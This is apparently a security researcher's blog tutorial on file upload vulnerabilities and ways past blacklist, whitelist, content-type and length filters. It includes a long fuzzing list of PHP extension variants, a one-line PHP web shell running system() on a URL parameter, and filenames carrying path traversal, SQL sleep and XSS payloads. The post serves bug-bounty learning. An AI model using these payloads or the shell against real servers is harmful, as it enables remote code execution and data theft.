Hi guys whatsup! This is Naveen an security researcher . Here im presenting my research on unrestricted file upload vulnerablities.
In this article , we are going to learn about
- what is unrestricted file upload vulnerability ?
- what we can do with this?
- Types of filters and filter bypass techniques
- Exploitation
What is file upload vulnerability?
File upload vulnerability is a major problem with web-based applications. In many web servers, this vulnerability depends entirely on purpose, that allows an attacker to upload a file with malicious code in it that can be executed on the server. An attacker might be able to put a phishing page into the website or deface the website.
An attacker may reveal internal information of web server to others and in some chances to sensitive data might be informal, by unauthorized people.
What we can do with this?
we can achive remote code execution with the file upload vulnerability by uploading php shell and also we can achieve XSS, LFI , XXE ,Phising, paramter pollution ,SQL injection , it may disclose sensitive info and internal paths and etc….
TYPES OF FILTERS ?
- Blacklisting bypass:
Blacklisting can be by passed by uploading unpopular php extensions .here i am providing some examples . best way to bypass this filter is fuzzing
phtml
php3
php4
php5
inc
pHtml
pHp
pHp3
pHp4
pHp5
iNc
iNc%00
iNc%20%20%20
iNc%20%20%20…%20.%20..
iNc……
inc%00
inc%20%20%20
inc%20%20%20…%20.%20..
inc……
pHp%00
pHp%20%20%20
pHp%20%20%20…%20.%20..
pHp……
pHp3%00
pHp3%20%20%20
pHp3%20%20%20…%20.%20..
pHp3……
pHp4%00
pHp4%20%20%20
pHp4%20%20%20…%20.%20..
pHp4……
pHp5%00
pHp5%20%20%20
pHp5%20%20%20…%20.%20..
pHp5……
pHtml%00
pHtml%20%20%20
pHtml%20%20%20…%20.%20..
pHtml……
php%00
php%20%20%20
php%20%20%20…%20.%20..
php……
php3%00
php3%20%20%20
php3%20%20%20…%20.%20..
php3……
php4%00
php4%20%20%20
php4%20%20%20…%20.%20..
php4……
php5%00
php5%20%20%20
php5%20%20%20…%20.%20..
php5……
phtml%00
phtml%20%20%20
phtml%20%20%20…%20.%20..
phtml……
2.whitelisting bypass:
It can be bypassed by uploading a file with some tricks double extensions (image.png.php) or by using null byte injection (image.php%00.png)
TIP: Bruteforce the extensions with unpopular extensions (provided above) to check acceptance.
3.Content-type validation:
This type of validation can be bypassed by changing the file name for example if it checks for image file keep the Content-type. such as ‘image/png’, ‘image/jpeg’,’image/gif’ (parameter will be like “image/*”)
4.content lenth Validation bypass:
by using the small payload we can bypass length example, sample payload
<?php
if($_GET[‘c’]) {
system($_GET[‘c’]);
}
?>
Other Tips:
- put file name ../../logo.png or ../../etc/passwd/logo.png to get directory traversal via upload file.
- upload the file using SQL command ‘sleep(10).jpg you may achieve SQL if image directly saves to db.
- Check for .svg file upload you can achieve stored XSS using XML payload
- change the file name to xss payloads (<svg onload=alert(document.domain)> you can achieve xss
Links you can refer:
Image Tragick Exploitation : https://mukarramkhalid.com/imagemagick-imagetragick-exploit/
Paypal Bugbounty Poc https://www.youtube.com/watch?v=2Kw6VPlBz9w&t=258s
